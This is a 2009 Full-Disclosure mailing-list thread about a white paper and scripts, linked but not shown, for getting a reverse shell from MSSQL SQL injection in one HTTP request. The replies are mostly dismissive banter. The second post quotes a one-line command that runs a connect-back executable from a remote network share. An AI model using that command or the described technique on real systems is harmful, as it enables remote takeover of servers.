
Mailing List Archive: Full Disclosure: Full-Disclosure

One Click Ownage [White Paper and Scripts]

 

 



ferruh at mavituna

Jul 3, 2009, 3:50 AM

Post #1 of 3 (210 views)
One Click Ownage [White Paper and Scripts]

This is a different and more practical approach to get a reverse shell
or code execution in SQL Injections (particularly in MSSQL). The idea
is simple: getting a reverse shell from an SQL Injection with one HTTP
request without using an extra channel such as TFTP or FTP to upload the
initial payload.

The white paper explains the steps and the details of the attack. The scripts
have all the tools you need to create your HTTP request with your own
payload.


White Paper:
http://ferruh.mavituna.com/papers/oneclickownage.pdf

Scripts:
http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip

Presentation (IT Underground 2009):
http://www.slideshare.net/fmavituna/one-click-ownage-1660539



Regards,


--
http://ferruh.mavituna.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


fdiggle at gmail

Jul 5, 2009, 9:22 PM

Post #2 of 3 (152 views)
Re: One Click Ownage [White Paper and Scripts]

Or just

'start \\DiggleSec.com\fredrick\connectback.exe'

would have also been acceptable.

But Fredrick is sure that your 20 page write-up was fantastically entertaining.

On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh[at]mavituna.com> wrote:
> This is a different and more practical approach to get a reverse shell
> or code execution in SQL Injections (particularly in MSSQL). The idea
> is simple. Getting a reverse shell from an SQL Injection with one HTTP
> request without using an extra channel such as TFTP, FTP to upload the
> initial payload.
>
> White paper explains the steps and the details of the attack. Scripts
> got all the tools you need to create your HTTP request with your own
> payload.
>
>
> White Paper:
> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>
> Scripts:
> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>
> Presentation (IT Underground 2009):
> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>
>
>
> Regards,
>
>
> --
> http://ferruh.mavituna.com
>


tbiehn at gmail

Jul 6, 2009, 8:07 AM

Post #3 of 3 (146 views)
Re: One Click Ownage [White Paper and Scripts]

Ferruh,
The script host can be restricted to prevent this 'attack'. Uploading
files to a Windows host has been beaten to death, it's frankly insane
that you ever got booked for some security conference.
But yeah, the last ditch effort is always NetBIOS, sometimes you even
have to modify the local box's rules to allow NBoIP. Hard stuff.

-Travis

On Mon, Jul 6, 2009 at 12:22 AM, Fredrick Diggle<fdiggle[at]gmail.com> wrote:
> Or just
>
> 'start \\DiggleSec.com\fredrick\connectback.exe'
>
> would have also been acceptable.
>
> But Fredrick is sure that your 20 page write-up was fantastically entertaining.
>
> On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh[at]mavituna.com> wrote:
>> This is a different and more practical approach to get a reverse shell
>> or code execution in SQL Injections (particularly in MSSQL). The idea
>> is simple. Getting a reverse shell from an SQL Injection with one HTTP
>> request without using an extra channel such as TFTP, FTP to upload the
>> initial payload.
>>
>> White paper explains the steps and the details of the attack. Scripts
>> got all the tools you need to create your HTTP request with your own
>> payload.
>>
>>
>> White Paper:
>> http://ferruh.mavituna.com/papers/oneclickownage.pdf
>>
>> Scripts:
>> http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
>>
>> Presentation (IT Underground 2009):
>> http://www.slideshare.net/fmavituna/one-click-ownage-1660539
>>
>>
>>
>> Regards,
>>
>>
>> --
>> http://ferruh.mavituna.com
>>
